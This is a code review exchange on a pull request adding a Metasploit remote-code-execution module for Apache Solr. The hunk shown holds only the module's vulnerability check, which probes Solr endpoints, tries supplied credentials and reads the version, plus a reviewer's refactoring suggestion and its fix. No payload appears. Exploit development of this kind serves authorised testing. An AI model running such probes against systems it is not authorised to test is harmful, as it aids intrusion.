modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,404 @@
+  # has the switch been flicked?
+  @params_resource_loader_enabled = false
+  # if authentication is used
+  @auth_string = ""
+
+  # check for vulnerability existence
+  def check
+    # see if authentication is required for the specified Solr instance
+    auth_check = send_request_cgi({
+                 'method'  => 'GET',
+                 'headers' => { 'Connection' => 'Keep-Alive' },
+                 'uri'     => '/solr/'
+      })
+
+    # successfully connected?
+    unless auth_check
+      return CheckCode::Unknown("Connection failed!")
+    end
+    # if return code is not 200, then the Solr instance definitely requires authentication
+    unless auth_check.code == 200
+      print_warning("Authentication required for #{peer}!")
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
+        return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
+      # otherwise, attempt authentication
+      else
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        # successfully connected?
+        unless attempt_auth
+          return CheckCode::Unknown("Connection failed!")
+        end
+        # if the return code is not 200, then authentication definitely failed
+        unless attempt_auth.code == 200
+          return CheckCode::Unknown('Authentication failed!')
+        end
+
+        print_good("Authentication succeeded!")
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
+      }
+    else
+      @headers = {
+        'Connection'      => 'Keep-Alive',
+        'Authorization'   => @auth_string.to_s
+      }
+    end
+
+    # send a GET request to get Solr and system details
+    ver = send_request_cgi({
+          'method'  => 'GET',
+          'headers' => @headers,
+          'uri'     => '/solr/admin/info/system'
+      })
+
+    # can't connect? that's an automatic failure
+    unless ver
+      return CheckCode::Unknown("Connection failed!")
+    end
+
+    # convert to JSON
+    ver_json = ver.get_json_document
+    # get Solr version
+    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
```

Comment:
`@solr_version` is used only 3 times, all within this method. It doesn't need to be a class variable.

```suggestion
    solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
```

Reply:
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29